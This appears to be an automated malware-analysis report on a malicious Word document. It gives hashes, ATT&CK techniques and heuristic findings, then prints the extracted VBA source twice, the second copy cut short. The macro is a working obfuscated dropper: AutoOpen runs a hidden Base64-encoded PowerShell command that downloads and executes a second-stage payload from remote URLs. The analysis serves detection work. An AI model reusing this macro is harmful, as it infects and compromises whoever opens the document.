Office (OLE) malware analysis — malicious · 1c7d3eae22affe05

MALICIOUS

Office (OLE)

104.5 KB Created: 2018-05-23 22:06:00 Authoring application: Microsoft Office Word First seen: 2018-07-04

MD5: 2ae61f25c658ac3710b698c16833db62 SHA-1: 24748a87a0c5b752085c8b2cb7c9e09c5b98b0a2 SHA-256: 1c7d3eae22affe057122e850edbab36de1ae3f91f38e6707450b302453521852

210 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing VBA macros. The Autoopen macro triggers a Shell() call, which executes a PowerShell command. This command is obfuscated using Base64 encoding and attempts to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6555536-0' further supports its malicious nature as a dropper.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6555536-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6555536-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

zEmib = 78373
EOTHX = Shell(FkCdKp + Chr(vbKeyP) + zZXzBwfVio + UjziHtpf, vbHide)
CkQrOp = vrpAkW - Cos(zIQTq) * 1 - Chr(25649) / 19916 - ChrB(iYzIr)

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub Autoopen()
On Error Resume Next
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15320 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15320 bytes
SHA-256: `4d3f0fef59276cf23de97a124575be2774f6cf266e3e231b786e9bb0fa19fac6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "GdEswVpwQSo" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function iuZAEiW() On Error Resume Next zkjim = cFocXs - Cos(pZHck) * 1 - Chr(73803) / 28466 - ChrB(XDtoPw) oUvJAQ = 68121 wSiPN = kpZRw - Cos(lWJHYf) * 1 - Chr(36612) / 54370 - ChrB(nuXdzQ) hNslG = 4344 iuZAEiW = FqNfhziY + PFDVqbAoP + ZbKinzvB + HpRniEwwPQ + cfrQGXvQp + iHqXlPVuM + FXolR + UOiinSm + YaUjYfZzmzY JCXBc = OTXRUs - Cos(LolVz) * 1 - Chr(13757) / 82004 - ChrB(YLlOo) IMYMY = 66969 End Function Sub Autoopen() On Error Resume Next AFBdq = STXFJG - Cos(IsbXnw) * 1 - Chr(22339) / 97021 - ChrB(qlnnWG) wEvKF = 21611 pHtzd (iuZAEiW) jrGRYr = FbHqH - Cos(kBYZX) * 1 - Chr(27489) / 29279 - ChrB(PqDSL) YANws = 95124 End Sub Function pHtzd(UjziHtpf) On Error Resume Next sjhhn = jkKfw - Cos(rWwjW) * 1 - Chr(74609) / 83588 - ChrB(UTACzM) cFNLwK = 9838 VrsjGf = FKHDUp - Cos(UrJABp) * 1 - Chr(47585) / 60398 - ChrB(hacHfz) zEmib = 78373 EOTHX = Shell(FkCdKp + Chr(vbKeyP) + zZXzBwfVio + UjziHtpf, vbHide) CkQrOp = vrpAkW - Cos(zIQTq) * 1 - Chr(25649) / 19916 - ChrB(iYzIr) wiKBf = 24656 End Function Attribute VB_Name = "QlzKpimi" Function FqNfhziY() On Error Resume Next wLusT = NrGQH - Cos(wSMRk) * 1 - Chr(73425) / 17732 - ChrB(SaCwi) WtWTrD = 75141 OGCiQ = "owersHeLL -WinD" + "owsTyle hi" + "dden -e" + " IABp" iFaiYO = whzIw - Cos(IZsBjO) * 1 - Chr(13873) / 93095 - ChrB(IwKfs) UmZEi = 36259 JPJWJTjk = "AGUAWAAgACgAKA" + "AoACIAew" + "A0ADQA" + "fQB7ADEAMAA0" + "AH0AewA5ADgA" + "fQB7ADEA" + "fQB7ADYAOQB9" + "AHsAOAAyAH0AewA" HqGNuk = tCnlC - Cos(TiSHo) * 1 - Chr(61274) / 63987 - ChrB(wcTtW) dvaDS = 34516 ziJRhfl = "xADYAfQB" + "7ADIA" + "OQB9AHsAM" + "QAwADMAfQB7" SBvVT = cfFKZ - Cos(dApTRQ) * 1 - Chr(96774) / 72272 - ChrB(KOmUYj) zcjSkt = 2243 bQpajCjHYt = "ADEAO" + "QB9AHsAMgA" + "0AH0AewAxADg" + "AfQB7ADYAMgB9A" + "HsANgA2AH0Aew" + "A1ADQAfQB7ADgA" + "NQB9AHsAMQAx" + "ADQAfQB7ADYA" + "NQB9AH" WlUJEb = SuQsAo - Cos(JnUjoH) * 1 - Chr(74724) / 18258 - ChrB(ummhd) GrkzMw = 61485 SpjqWO = "sAMwAwAH0Aew" + "A3ADkAfQB7" + "ADgANgB" + "9AHsANQA4" + "AH0AewAyADUAf" ojFTwr = jiCWS - Cos(wEEtqN) * 1 - Chr(69602) / 49944 - ChrB(SuOro) HBbid = 85167 QkwVFoVz = "QB7ADcAMAB" + "9AHsAMQAwA" + "DYAfQ" + "B7ADcAf" + "QB7ADQAfQ" + "B7ADQ" zjoqSz = DkKKi - Cos(njFVj) * 1 - Chr(91882) / 41113 - ChrB(NKFEC) ZharpE = 36921 iizUvdRAc = "ANQB9" + "AHsANgA" + "wAH0A" + "ewAzA" + "DkAfQB7ADEAMA" + "AwAH0AewAzADMA" + "fQB7ADMA" + "NQB9AHsANwA0A" FqNfhziY = OGCiQ + JPJWJTjk + ziJRhfl + bQpajCjHYt + SpjqWO + QkwVFoVz + iizUvdRAc End Function Function PFDVqbAoP() On Error Resume Next VFAvm = TijDN - Cos(kbwGuh) * 1 - Chr(44061) / 26912 - ChrB(YjmPRp) JSUao = 66889 zEcKw = "H0AewAxADQAfQB7" + "ADkAMwB9A" + "HsAMwA2AH0" + "AewA0ADEAf" + "QB7ADgAOAB9A" + "HsANwAz" + "AH0AewAxA" + "DEANQB" AVoIJ = fbBqVu - Cos(kTwIhF) * 1 - Chr(35908) / 95435 - ChrB(NfVWw) QinsC = 32876 OVJakqMv = "9AHsANQAyAH0A" + "ewA4AD" + "kAfQB7ADYANAB9" + "AHsAM" + "QAxADMAfQB7ADU" + "AfQB7ADkANg" + "B9AHsAOAA0AH0A" + "ewAyAD" + "gAfQB7ADQAMgB9" lGYNPG = iwtWrl - Cos(VMsjQM) * 1 - Chr(59281) / 15618 - ChrB(nnBGK) Cdsjp = 66608 WsAfvzP = "AHsANwAxAH0AewA" + "xADAAfQB" + "7ADUANwB9AHsANg" + "AxAH0AewAxADA" + "AOQB9A" + "HsANAAwAH0AewA" + "xADAA" + "NwB9AHsANwA" + "3AH0AewA" jTpLAn = mwfLi - Cos(WuJmEQ) * 1 - Chr(55760) / 95605 - ChrB(aOAmPu) iKwHf = 55985 QRBpdz = "yADEAfQB7AD" + "QAOQB9AHsANwAy" + "AH0AewAzA" + "DQAfQB7ADUAM" + "QB9AH" tELrr = oHqXP - Cos(HTGcYF) * 1 - Chr(86270) / 96467 - ChrB(aKOXWW) UObPt = 41972 VJrFBkt = "sAOAB9AHsANwA4" + "AH0AewAyADM" + "AfQB7ADYANwB9AH" + "sANQA1AH0AewA" + "4ADAAfQB7ADEA" + "MQB9AHs" hsZlb = SYdXTm - Cos(XiXBmi) * 1 - Chr(60336) / 36457 - ChrB(zTUATn) wzClDY = 68863 otWfPXMzZj = "AMQAwADIAfQB7AD" + "EAMQAyAH0A" + "ewAxADA" + "AOAB9AHs" + "AMQAwADEA" + "fQB7ADIANgB9" + "AHsAOQA3AH0AewA" + "xADIAfQB7" + "ADcANgB9A" + "HsAMgB9" URBbCh = DkZzmr - Cos(dOqwo) * 1 - Chr(89635) / 11834 - ChrB(bdfwh) RAsww = 46464 QOwDIlGqz = "AHsAOQAyAH" + "0AewA5AH" + "0AewAwAH0AewAyA" + "DcAfQB" + "7ADQAOAB9AHsAN" PFDVqbAoP = zEcKw + OVJakqMv + WsAfvzP + QRBpdz + VJrFBkt + otWfPXMzZj + QOwDIlGqz End Function Function ZbKinzvB() On Error Resume Next UdEQMH = kaWBk - Cos(VovGk) * 1 - Chr(79227) / 86794 - ChrB(qYwFA) mjjwn = 36989 RtmlSRApm = "QAzAH0AewA2" + "AH0AewAx" + "ADUAfQB7ADgAMQB" + "9AHsAMwB9AHsA" + "NAA2AH0Aew" Ikmjcn = jAGiMK - Cos(dFmOJ) * 1 - Chr(59669) / 59208 - ChrB(FIKLoc) uYNQf = 25324 aqCjlKzur = "A1ADAAfQB7" + "ADUANgB9AHsAMwA" + "yAH0AewA5" + "ADUAfQB7ADkA" + "OQB9AHsANwA" IaIBC = qRRtp - Cos(Jiuki) * 1 - Chr(77319) / 24622 - ChrB(fiVQwN) FiQvfp = 48693 FsYAi = "1AH0AewAxADc" + "AfQB7A" + "DgANw" + "B9AHsANAAzAH0Ae" + "wA2ADgAfQ" + "B7ADgAMwB9AHsAM" LFHcIo = qRWYTW - Cos(ojcSj) * 1 - Chr(47330) / 59158 - ChrB(sDoqk) BzKakh = 66493 BkzFRWSo = "QAxADEAfQB7ADE" + "AMAA1A" + "H0AewA0ADcAfQB7" + "ADIAMAB9AHsANgA" + "zAH0AewAz" + "ADcAf" + "QB7ADEAMQAwA" + "H0AewA5AD" ZbKinzvB = RtmlSRApm + aqCjlKzur + FsYAi + BkzFRWSo End Function Function HpRniEwwPQ() On Error Resume Next WLEprn = uZuJF - Cos(hTNGAR) * 1 - Chr(13817) / 25121 - ChrB(nRDEp) LwjoR = 18211 zwijZsALHB = "AAfQB7ADI" + "AMgB9AHsANQA5AH" + "0AewA5ADEAf" + "QB7ADE" + "AMwB9A" QNthq = wduhf - Cos(TdzUjQ) * 1 - Chr(52682) / 33909 - ChrB(Xmmmw) ibLUnk = 39343 tzOPrKEjbf = "HsAMw" + "A4AH0AewA5" + "ADQAfQB7AD" + "MAMQB9ACIA" + "LQBmACc" + "AZQBlAEw" zMTaH = btkXP - Cos(qOdzY) * 1 - Chr(81645) / 84301 - ChrB(tbGusP) BjMsE = 98599 bDPPMMUuzJ = "AWgAnAC" + "wAJwBaAGUAJwAsA" + "CcAIAAnACwAJwBF" + "AEQAJwA" + "sACcAdABlAG0" + "ALgBO" wHQpUC = iCOXdt - Cos(wLwws) * 1 - Chr(49038) / 17634 - ChrB(GYirw) KYiKWO = 31129 vpwiQVBODzA = "AGUAdA" + "AuAFcAZQBiA" + "EMAJwAsACcAW" + "gAzACcALAAnA" + "HQAcgB5AHsA" + "JwAsACcAUwB5AH" + "MAJwAsACc" + "ALgBj" jiWoE = ZrXOV - Cos(CXPvMZ) * 1 - Chr(35586) / 50757 - ChrB(sGcEQ) djNHf = 7085 cFYQTFmRwvr = "AG8AbQAv" + "AHcAJwAsACc" + "AWgAnA" + "CwAJw" cNaDVu = OATVCX - Cos(Iiwwwp) * 1 - Chr(39094) / 83361 - ChrB(tknuvI) Hqsav = 3679 vvofZw = "BLAEsAL" + "wBAAGgAdA" + "B0AHAAOgAv" + "AC8AaABhAG4A" + "bgBpAGcAYQB" + "uACcALAAn" + "AEwAWgBlACk" + "AOwB0ACcALAAnA" + "GMAIAArACAATA" IEXbn = nHBtiV - Cos(OKjNI) * 1 - Chr(70620) / 73189 - ChrB(ThADGq) iJzqG = 26020 sOuZZXDOOJ = "BaAGUASw" + "BRADQATABaA" + "GUAJwA" + "sACcAYQ" + "BTAEQAQwApA" rYOjAo = iuLaHv - Cos(HiRLPo) * 1 - Chr(79062) / 44904 - ChrB(YhBbc) wsOnYS = 21072 YsPkHisAqb = "DsAYgByACcALAA" + "nAGEAZABhAHM" + "AZAAnA" + "CwAJwB0ADcAYQBZ" + "ACcALAAnAEwAJwA" bkzvkm = dwuOXf - Cos(fqZAUA) * 1 - Chr(79898) / 99298 - ChrB(NJqwTL) Wiwiq = 50838 HLUaElN = "sACcAYQBzAGYAYw" + "AuAG0AN" + "QBFAFQAbwBTAHQA" + "cgBpAHQA" + "SwBpAGkAdA" + "AnACwAJwBaAGUAd" sEkiv = GMFMRM - Cos(OYwKK) * 1 - Chr(53284) / 72432 - ChrB(mtoVRf) kaAoE = 46482 YjMtt = "wAtACcALAAnA" + "FoAZQAnACwAJwB" + "uACcAL" + "AAnAG0A" + "JwAsAC" + "cAWgBlAGsATAA" HpRniEwwPQ = zwijZsALHB + tzOPrKEjbf + bDPPMMUuzJ + vpwiQVBODzA + cFYQTFmRwvr + vvofZw + sOuZZXDOOJ + YsPkHisAqb + HLUaElN + YjMtt End Function Function cfrQGXvQp() On Error Resume Next wjSuRs = DihGn - Cos(wjmUO) * 1 - Chr(78406) / 66993 - ChrB(LwNdD) ciMcIz = 65063 BndjHQrtnE = "nACwAJwByA" + "EUAYgBjAC" + "8AJwAsACc" + "AKwBMACc" + "ALAAnAFoAZQArA" + "EwAWgBlACcALAA" + "nADcAJwAsAC" + "cAZQApADs" OsQKti = PHOiZZ - Cos(ojZPp) * 1 - Chr(49279) / 70736 - ChrB(EQOJZZ) EwnXW = 33846 tqqDulzT = "AJwAsACcAZ" + "AB2AC0AcwB5A" + "HMAJwAsACcAWgB" + "lAGUAJw" + "AsACcAZABvAG0" + "AOwB0ADcAYQBZAC" + "cALAAnAH0AJ" EEvAYw = wwdJXq - Cos(DsKIra) * 1 - Chr(75891) / 98665 - ChrB(jJJwCQ) CCmubV = 39105 cLkPElNB = "wAsACcAbAA" + "nACwAJwAgAD0AIA" + "AnACwAJwBUAC8AQ" + "ABoAHQAdABwAD" + "oALwAvAGcAZQBu" BowFSl = BimBG - Cos(PfqGFI) * 1 - Chr(23782) / 82691 - ChrB(zmiHb) lwEhX = 41571 OvAFdBmp = "AGUAJwAsA" + "CcAdAA3AGEAJ" + "wAsACcA" + "MQAnACwAJwBaAC" + "cALAAnA" + "GUAYQ" + "BrACcALAAnAHQAO" + "wB0ADcAJwAsA" + "CcAQABoAHQAdABw" CchhL = IaKBJO - Cos(WvnWMH) * 1 - Chr(96088) / 74483 - ChrB(MXKJsP) iTiHId = 27483 jdFZmwwWSo = "ACcALAAnAD" + "AAMAAwADA" + "ALAAnACwAJwB" + "0AGUAJwAsACc" + "ALAAgACcAL" + "AAnAHQ" + "ANwBhAG4AcwB" Xzdin = lYsokp - Cos(hVPXU) * 1 - Chr(26180) / 31222 - ChrB(WBqsn) hbHdth = 27626 vfcpC = "hAGQAYQBzAGQA" + "IAAnACw" + "AJwBsAGkAZQAnAC" + "wAJwBvAGkAdABL" + "AFcAJwAsAC" + "cATABaAGUAS" + "QAnACwAJw" + "BmAG8Ac" + "gBlAGEAYw" PiPwza = RVHaiA - Cos(SjoPwO) * 1 - Chr(2201) / 92116 - ChrB(qzMDwl) rHujF = 71542 rPbuDpIwhY = "BoACgAJwAsAC" + "cALQBrAG8AZ" + "QBuAGkAZwAu" + "AGQAZQAvA" + "EMAJwA" + "sACcAbgBsAGkAd" + "ABLAE8" + "AJwAsACcA" + "cgBhAGw" VNpLE = iSJciJ - Cos(pijzz) * 1 - Chr(37828) / 84421 - ChrB(wmWBj) QSkRt = 63865 cGKfzRCVMp = "AYgBpAGsA" + "ZQBzACcALAAnA" + "D0AIABM" + "AFoAZQANAAo" + "AJwAsA" + "CcAdAA3AGEAYQB" TBIDwP = XqkVn - Cos(VNYul) * 1 - Chr(72763) / 87121 - ChrB(WaSJXV) AZLpc = 94459 JzZzmkpwsOi = "zAGYAYwAgAGkAb" + "gAgAHQANwBhAEE" + "ARABDAFgAK" + "QB7AC" + "cALAAnA" + "CsATAB" + "aACcALAAnAF" cfrQGXvQp = BndjHQrtnE + tqqDulzT + cLkPElNB + OvAFdBmp + jdFZmwwWSo + vfcpC + rPbuDpIwhY + cGKfzRCVMp + JzZzmkpwsOi End Function Function iHqXlPVuM() On Error Resume Next cawBD = BICBOT - Cos(CtpfHn) * 1 - Chr(83907) / 93923 - ChrB(qtYulX) ZfLPz = 71396 DZXSia = "oAZQAuA" + "FMAcABsAGkAdAA" + "nACwAJwBhAGQAR" + "gBJAGkAdABLA" + "CcALAAnAHMALg" + "B1ACc" + "ALAAnAGUAbgBlAE" wkhFiN = QvEjP - Cos(kfioF) * 1 - Chr(48136) / 2916 - ChrB(CcJCds) WCDpRw = 82849 fKZjm = "wAJwAsAC" + "cAWgBlACsATAB" + "aACcALAA" + "nAG4AJwAsACcAcw" ZiJiCZ = UNVRju - Cos(XKajMv) * 1 - Chr(14801) / 46805 - ChrB(EVwut) rwKtk = 17330 jsjBQJLzbaC = "AvAGsAMgB" + "pAHIAOQAnA" + "CwAJwBvAGI" + "AJwAsACcA" + "dgBvAEwA" + "JwAsACcAcAA6A" + "C8ALwBpAHMAY" + "QAnACwAJ" vqzLF = vjMLi - Cos(itOhj) * 1 - Chr(91772) / 75962 - ChrB(fFMGi) UWXGn = 19133 YHoiKSfNna = "wBlACkAI" + "AByAGEAbg" + "AnACwA" + "JwBqAGUA" + "YwBMAFoAZQ" + "AnACwAJ" + "wBMACc" + "ALAAnA" + "HQANwBhACcALAAn" + "AG4ATAAnACwA" ROkkAp = cWrKNW - Cos(GcQaz) * 1 - Chr(93806) / 15444 - ChrB(qdshBn) JFYYk = 24980 jwBckbTj = "JwB3AC" + "cALAAnAG" + "0AZQA" + "uAGQAZQ" + "AvAHgA" + "TwA4AHgA" + "JwAsACcAbwBP" iziFoY = NCsHp - Cos(uGjpN) * 1 - Chr(62015) / 83489 - ChrB(HrToL) Mllpl = 3349 nPLUDz = "ACcALAAnAD" + "sAJwAsACc" + "AbgBzA" + "CcALAA" + "nACgAdAA3A" + "GEAJwAsACcAIAA" + "rACAAdAA3AG" + "EATgBTAEI" iHqXlPVuM = DZXSia + fKZjm + jsjBQJLzbaC + YHoiKSfNna + jwBckbTj + nPLUDz End Function Function FXolR() On Error Resume Next zSrrIj = caAZM - Cos(iCZjLE) * 1 - Chr(41491) / 14312 - ChrB(GPRcV) cRDWnm = 94098 NWEFZ = "AIAArAC" + "cALAAn" + "AGEAJwAsACc" + "ANQAnACw" ozEwZu = rtblYK - Cos(CihjT) * 1 - Chr(50482) / 24587 - ChrB(ZjOVAJ) DZnhOl = 71597 wZzSVPHsW = "AJwBZAFUAI" + "AA9ACAALgAo" + "AEwAJwAsACcAK" + "ABMAFoAZQ" + "BAACcALAAnAFkA" + "VQAuAG0ANQAnAC" + "wAJwBa" + "AGUAKw" + "AnACwAJwBT" HvMqO = qrwlQ - Cos(ZoHSW) * 1 - Chr(52395) / 22192 - ChrB(YiEuX) qCzqva = 32555 GKKoaVEouhG = "AEQAQwApA" + "CcALAAnAHQ" + "AcAA6AC8ALw" + "BwAGwAbwBzAHMA" + "LQBlACcALAAnAGU" + "AdAAnACwAJwB" + "aACcALAAnAEs" + "ATgBnAG0ANQBFAC" akHjz = jpRkk - Cos(XORULn) * 1 - Chr(50175) / 24994 - ChrB(YrSTUf) tGpqwB = 27867 GNbfjwif = "gAKQAnACwAJwAg" + "ADIAOAA" + "yADEAMwAz" + "ACkAJwA" + "sACcAaAB0AHQ" + "AJwAsACcAKwBM" + "ACcALAAn" LndEo = RUJdWb - Cos(dfIzDo) * 1 - Chr(2615) / 86435 - ChrB(QdbvvL) tvVAvJ = 45983 ikHht = "AGUAZQAtAE" + "kAdABlA" + "G0ATABaAGUAKQA" + "oAHQANwAnA" + "CwAJwAoAEwA" + "WgBlAC4AZQB4AEw" VYzHX = pwDDQ - Cos(hquNNd) * 1 - Chr(43785) / 43839 - ChrB(csnGZ) iAbpT = 15013 iuCLQf = "AWgBlAC" + "sATAA" + "nACwAJwAuAG" + "4AZQB4AHQAKAAn" + "ACwAJwA7AH" + "0AYwB" + "hAHQAYwB" + "oAHsAfQAnACwAJw" + "BlACcA" + "LAAnAGQAL" ifptVj = iXsfkN - Cos(BInRm) * 1 - Chr(2150) / 18824 - ChrB(fLBzsH) cNwSiM = 28366 lRTYHuIuRqw = "wBAAGgAdAAnACwA" + "JwBhAG" + "UAbgB2" + "ADoAc" TIqvV = AHVMM - Cos(rnYjGo) * 1 - Chr(72072) / 381 - ChrB(sXnThv) jSirml = 38552 ohmrlzHA = "AB1AGIAbABpACcA" + "LAAnACYAKA" + "BMACcALA" + "AnAG0ANQBF" + "ACcALAA" + "nAGEATgBTAEIAJ" + "wAsACcAPQ" + "AgAHQAJwA" + "sACcANwAnACwAJw" + "BMACcA" vFonf = flfaF - Cos(pPLtaO) * 1 - Chr(88398) / 50852 - ChrB(DcoJVY) hVuGT = 29804 ffEBKAf = "LAAnAD" + "0AIAAnACwAJwA" + "oACcALAAnAEwA" + "WgBlACsAT" + "ABaAGUALQBvAGI" + "AagBlAGMAdAB" + "MAFoA" + "ZQApACAAJwAs" + "ACcAOgAvAC8" BAzUZM = ItbGpT - Cos(lQXrt) * 1 - Chr(46317) / 86220 - ChrB(AiKfcE) fzVZi = 19925 EKdaqwmcFTL = "AZgAnACwAJw" + "BTAEQAQ" + "wAgACcALAA" + "nAC8A" + "JwAsA" + "CcAZQAnACw" FXolR = NWEFZ + wZzSVPHsW + GKKoaVEouhG + GNbfjwif + ikHht + iuCLQf + lRTYHuIuRqw + ohmrlzHA + ffEBKAf + EKdaqwmcFTL End Function Function UOiinSm() On Error Resume Next dtUNwu = MDfFww - Cos(WPars) * 1 - Chr(47518) / 99668 - ChrB(Ktjhw) bkQow = 83743 HcOEsGpR = "AJwA7ACYAJwA" + "sACcAYQA" + "nACwAJwBtAGEAaQ" + "BuAGUALgBjAG8" + "AbQAvAHMAJwAs" + "ACcATABaA" + "CcALA" + "AnAHQANwBhA" iWfZzt = afajHE - Cos(kuiml) * 1 - Chr(87816) / 18866 - ChrB(bdRwWk) OQAES = 85307 jXIQvwUYj = "EEARABDAFgAI" + "AAnACkAK" + "QAuAHIARQBQAEwA" + "YQBDAEUAKAAoAF" + "sAYwBIAE" + "EAcgBdAD" + "EAMAA1ACsAWw" + "BjAEgAQQBy" uSufMt = TDZuDr - Cos(hCKzdv) * 1 - Chr(91420) / 3997 - ChrB(BXCHQ) jDmQr = 1218 LqXjMM = "AF0AMQAxADYAKw" + "BbAGMA" + "SABBAHIAX" + "QA3ADUAKQAsA" + "FsAcwBUAFIASQ" + "BuAEcAX" + "QBbAGMASABBAHI" sGhQD = arBSt - Cos(jOpGoz) * 1 - Chr(94478) / 85001 - ChrB(sHJlP) XWImA = 79652 YhVwbu = "AXQA5A" + "DYAKQAuAH" + "IARQBQAE" + "wAYQBDAE" + "UAKAAnAHQAN" + "wBhACcALABb" + "AHMAVABSAEkAbg" KEQMr = bQzFJi - Cos(vqwzTu) * 1 - Chr(16216) / 11368 - ChrB(wXfowD) tfsnP = 7772 CdvniHV = "BHAF0AWwBj" + "AEgAQQByAF" + "0AMwA2AC" + "kALgB" + "yAEUAUABMAG" + "EAQwBFACgA" + "JwBMAFoAZ" + "QAnACwAWwBz" + "AFQAUg" + "BJAG4ARwBdAFs" qbFJQt = CAGfNj - Cos(KTFjLK) * 1 - Chr(10696) / 85594 - ChrB(DoYvFZ) rUrEF = 41429 SNzGBPCOVZ = "AYwBI" + "AEEAcgB" + "dADMAO" + "QApAC4" + "AcgBFAFAATABhA" + "EMARQAoACgAWw" + "BjAEgAQQByAF" krMGv = YIlWu - Cos(MmGDtj) * 1 - Chr(96167) / 89451 - ChrB(Uswnd) PLVcUp = 8481 TXLqn = "0AMQAwAD" + "kAKwBbAGMASABB" + "AHIAX" + "QA1ADMAKw" + "BbAGMASA" + "BBAHIAXQA2A" + "DkAKQAsA" pzEJU = uCBBX - Cos(dkRwY) * 1 - Chr(14680) / 51977 - ChrB(PzOTS) JzQuZt = 15222 ZBQUc = "FsAcwBUAFIAS" + "QBuAEcAXQ" + "BbAGMASAB" + "BAHIAXQAzADQAK" + "QAuAHIAR" + "QBQAEwAYQB" RDpWd = HSrzQP - Cos(itWEN) * 1 - Chr(27502) / 83945 - ChrB(qllrj) wlHbdF = 22621 QLppol = "DAEUA" + "KAAoAFsAYw" + "BIAEE" + "AcgBdADcANQAr" + "AFsAYwBIAEEAcg" + "BdADgAMQA" UOiinSm = HcOEsGpR + jXIQvwUYj + LqXjMM + YhVwbu + CdvniHV + SNzGBPCOVZ + TXLqn + ZBQUc + QLppol End Function Function YaUjYfZzmzY() On Error Resume Next OJBip = zHQCC - Cos(iEupMf) * 1 - Chr(31277) / 24032 - ChrB(RDiwlK) jVmKuK = 60725 iEDjsLi = "rAFsAYwBIAE" + "EAcgBdAD" + "UAMgApACwAWwB" + "zAFQAUg" + "BJAG4" + "ARwBdAF" CiYmH = UiowVs - Cos(RPwpzt) * 1 - Chr(93218) / 10846 - ChrB(hDuRX) QsnUYh = 75773 iCENnPQibnP = "sAYwBIAEEAcgBdA" + "DkAMgApACAA" + "KQAgAA==" YaUjYfZzmzY = iEDjsLi + iCENnPQibnP End Function

SHA-256: 4d3f0fef59276cf23de97a124575be2774f6cf266e3e231b786e9bb0fa19fac6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "GdEswVpwQSo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function iuZAEiW()
On Error Resume Next
zkjim = cFocXs - Cos(pZHck) * 1 - Chr(73803) / 28466 - ChrB(XDtoPw)
oUvJAQ = 68121
wSiPN = kpZRw - Cos(lWJHYf) * 1 - Chr(36612) / 54370 - ChrB(nuXdzQ)
hNslG = 4344
iuZAEiW = FqNfhziY + PFDVqbAoP + ZbKinzvB + HpRniEwwPQ + cfrQGXvQp + iHqXlPVuM + FXolR + UOiinSm + YaUjYfZzmzY
JCXBc = OTXRUs - Cos(LolVz) * 1 - Chr(13757) / 82004 - ChrB(YLlOo)
IMYMY = 66969
End Function
Sub Autoopen()
On Error Resume Next
AFBdq = STXFJG - Cos(IsbXnw) * 1 - Chr(22339) / 97021 - ChrB(qlnnWG)
wEvKF = 21611
pHtzd (iuZAEiW)
jrGRYr = FbHqH - Cos(kBYZX) * 1 - Chr(27489) / 29279 - ChrB(PqDSL)
YANws = 95124
End Sub
Function pHtzd(UjziHtpf)
On Error Resume Next
sjhhn = jkKfw - Cos(rWwjW) * 1 - Chr(74609) / 83588 - ChrB(UTACzM)
cFNLwK = 9838
VrsjGf = FKHDUp - Cos(UrJABp) * 1 - Chr(47585) / 60398 - ChrB(hacHfz)
zEmib = 78373
EOTHX = Shell(FkCdKp + Chr(vbKeyP) + zZXzBwfVio + UjziHtpf, vbHide)
CkQrOp = vrpAkW - Cos(zIQTq) * 1 - Chr(25649) / 19916 - ChrB(iYzIr)
wiKBf = 24656
End Function


Attribute VB_Name = "QlzKpimi"
Function FqNfhziY()
On Error Resume Next
wLusT = NrGQH - Cos(wSMRk) * 1 - Chr(73425) / 17732 - ChrB(SaCwi)
WtWTrD = 75141
OGCiQ = "owersHeLL -WinD" + "owsTyle hi" + "dden -e" + " IABp"
iFaiYO = whzIw - Cos(IZsBjO) * 1 - Chr(13873) / 93095 - ChrB(IwKfs)
UmZEi = 36259
JPJWJTjk = "AGUAWAAgACgAKA" + "AoACIAew" + "A0ADQA" + "fQB7ADEAMAA0" + "AH0AewA5ADgA" + "fQB7ADEA" + "fQB7ADYAOQB9" + "AHsAOAAyAH0AewA"
HqGNuk = tCnlC - Cos(TiSHo) * 1 - Chr(61274) / 63987 - ChrB(wcTtW)
dvaDS = 34516
ziJRhfl = "xADYAfQB" + "7ADIA" + "OQB9AHsAM" + "QAwADMAfQB7"
SBvVT = cfFKZ - Cos(dApTRQ) * 1 - Chr(96774) / 72272 - ChrB(KOmUYj)
zcjSkt = 2243
bQpajCjHYt = "ADEAO" + "QB9AHsAMgA" + "0AH0AewAxADg" + "AfQB7ADYAMgB9A" + "HsANgA2AH0Aew" + "A1ADQAfQB7ADgA" + "NQB9AHsAMQAx" + "ADQAfQB7ADYA" + "NQB9AH"
WlUJEb = SuQsAo - Cos(JnUjoH) * 1 - Chr(74724) / 18258 - ChrB(ummhd)
GrkzMw = 61485
SpjqWO = "sAMwAwAH0Aew" + "A3ADkAfQB7" + "ADgANgB" + "9AHsANQA4" + "AH0AewAyADUAf"
ojFTwr = jiCWS - Cos(wEEtqN) * 1 - Chr(69602) / 49944 - ChrB(SuOro)
HBbid = 85167
QkwVFoVz = "QB7ADcAMAB" + "9AHsAMQAwA" + "DYAfQ" + "B7ADcAf" + "QB7ADQAfQ" + "B7ADQ"
zjoqSz = DkKKi - Cos(njFVj) * 1 - Chr(91882) / 41113 - ChrB(NKFEC)
ZharpE = 36921
